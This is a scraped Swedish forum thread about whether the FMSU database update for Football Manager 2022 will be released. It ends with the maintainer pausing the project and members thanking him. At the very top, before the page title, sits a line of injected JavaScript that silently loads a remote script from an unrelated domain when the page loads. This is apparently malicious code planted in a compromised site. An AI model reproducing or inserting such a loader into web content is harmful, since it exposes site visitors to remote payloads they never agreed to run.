;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); FMSU? – Football Manager 2022 – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

FMSU?

23 Inlägg
15 Users
53 Reactions
1,790 Visningar
FMViktor91
(@fmviktor91)
Estimable Member
Topic starter  

Blir det någon FMSU till FM22 Peter Hecktor ? 🙂 Får man ha önskemål om att ta bort brexit och skador?

Citera
trashbag
(@trashbag)
Reputable Member Admin

Postad av: @fmviktor91

Blir det någon FMSU till FM22 Peter Hecktor ? 🙂 Får man ha önskemål om att ta bort brexit och skador?

Och då önskar jag precis det motsatta då en seriös uppdateringsfil ska spegla verkligheten.

Men det är klart, man kan ju göra flera separata filer. En som hanterar t.ex. övergångar och en som hanterar det andra. Men det brukar å andra sidan finnas lite varstans på engelskspråkiga sidor (Brexit-delen).

Micke reacted
SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member
Topic starter  

@trashbag 

eftersom man vill få bort skadorna är utmaningen med Barcelona där alla spännande spelare är skadad.  Samt svårt att få Anel Ahmedhodzic till PL pga han får ej arbetstillstånd även att han klassas som egen produkt i england

SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

Postad av: @trashbag
Postad av: @fmviktor91

Och då önskar jag precis det motsatta då en seriös uppdateringsfil ska spegla verkligheten.

Men det är klart, man kan ju göra flera separata filer. En som hanterar t.ex. övergångar och en som hanterar det andra. Men det brukar å andra sidan finnas lite varstans på engelskspråkiga sidor (Brexit-delen).

Är på KingKongTrashs sida här. För mig är FMSU den optimala realistiska uppdateringsdatabasen och får gärna fortsätta så.

Phansell and Micke reacted
SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member
Topic starter  

@argt-troll 

Alla får tycka olika helt enkelt. Själv tycker man blir låst om man har massa skador! Speciellt Barcelona. 1a säsongen lär ju gå åt skogen eftersom de är många tongivande som är skadad. Realistiskt eller ej! 

SvaraCitera
(@dinoraider)
Active Member

Det går ju åt skogen för Barcelona i verkligheten också! Håller med fullständigt i ditt resonemang @trashbag

Micke and Phansell reacted
SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member
Topic starter  

@dinoraider Ja men man vill väl ändå ha utmaningen att vända det? Men går ju ej att de flesta offensiva pjäserna är skadade och inga pengar att handla ersättare för! Jaja. Alla tycker olika! Är väl ändå det taktiska man vill spela och då är ju egentligen inte realitet det viktigaste? Spelarna är ju fortfarande i det lag det tillhör

SvaraCitera
Micke
(@micke)
Reputable Member Admin

C:\Program Files (x86)\Steam\steamapps\common\Football Manager 2022\data\database\db\2201\dbc

Om du går in i denna mapp finns det en fil som heter "brexit", om du tar bort den antar jag att det även försvinner från spelet. Har dock ej testat detta själv ännu.

"I have never played for a draw in my life." - Sir Alex Ferguson

SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member
Topic starter  

@micke hittar icke

SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Hej!

Jag har faktiskt inte bestämt mig ännu. Jag jobbar heltid som lärare, är trummis i Date, har sambo, hus och två småbarn. Är sportchef och assisterande tränare i min moderklubb som i år gick upp i division 3 och det tar mycket tid.

Senaste åren har jag inte kunnat spela FM typ då all min tid har gått åt att uppdatera FMSU..

Som sagt, inte bestämt mig ännu men måste ta ett beslut efter helgen.

This post was modified 3 år sedan by Peter Hecktor

Nilisse, raca14, Phansell and 2 people reacted
SvaraCitera
raca14
(@raca14)
Reputable Member

@peter-hecktor Det finns ingen möjlighet till att vi är några stycken som har hand om ett eller flera länders övergångar för att underlätta för dig? Om det nu skulle kunna vara en möjlighet kanske?

Micke reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

Postad av: @peter-hecktor

Hej!

Jag har faktiskt inte bestämt mig ännu. Jag jobbar heltid som lärare, är trummis i Date, har sambo, hus och två småbarn. Är sportchef och assisterande tränare i min moderklubb som i år gick upp i division 3 och det tar mycket tid.

Senaste åren har jag inte kunnat spela FM typ då all min tid har gått åt att uppdatera FMSU..

Som sagt, inte bestämt mig ännu men måste ta ett beslut efter helgen.

Oavsett förtjänar du enorma hyllningar för de jobbet du lägger ned. Grymt jobbat hittills och förhoppningsvis framöver! Du har PM förresten. 

Micke reacted
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Tråkigt men förståeligt till fullo!
Ett jäkla hästjobb du gjort!

Micke reacted
SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Nu har jag tagit ett beslut och tyvärr väljer jag att pausa mitt jobb med FMSU.

Tiden räcker som sagt inte till tyvärr. Jag jobbar heltid som lärare, är trummis i Date, har sambo, hus och två småbarn. Är sportchef och assisterande tränare i min moderklubb som i år gick upp i division 3 och det tar mycket tid.

Under 2021 så hann jag knappt spela spelet då all tid gick åt till FMSU. Det blir fel i min värld.

Hoppas ni förstår 🙂

raca14, jonatannk, Micke and 2 people reacted
SvaraCitera
Phansell
(@phansell)
Trusted Member

Fullt förståeligt Peter. Fullt förståeligt. 

Hoppas du får tid nu att njuta utav spelet också!

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli

SvaraCitera
friggan
(@friggan)
Estimable Member

@peter-hecktor Tack för allt jobb du gjort genom åren! 

Phansell reacted
SvaraCitera
(@thefredricksson)
New Member

@peter-hecktor Kan någon ta över stafettpinnen på något enkelt sätt, eller kan vi bidra med något för blidka sambo och barn? 

Glömde tacka för allt jobb, är gammal cm-spelare och hittat tillbaka sedan 2021 på fm...

This post was modified 3 år sedan by thefredricksson

Micke reacted
SvaraCitera
Micke
(@micke)
Reputable Member Admin

Tack för allt, Peter! Ditt jobb har varit oerhört uppskattat under lång tid.

"I have never played for a draw in my life." - Sir Alex Ferguson

Phansell reacted
SvaraCitera
CLWS
 CLWS
(@clws)
Active Member

Tack för allt, Peter!

This post was modified 3 år sedan by CLWS

SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Postad av: @clws

Tack för allt, Peter!

Magiskt!

Maila info@fmsweden.se så kan vi snacka mer!

Micke reacted
SvaraCitera
Sida 1 / 2
Share: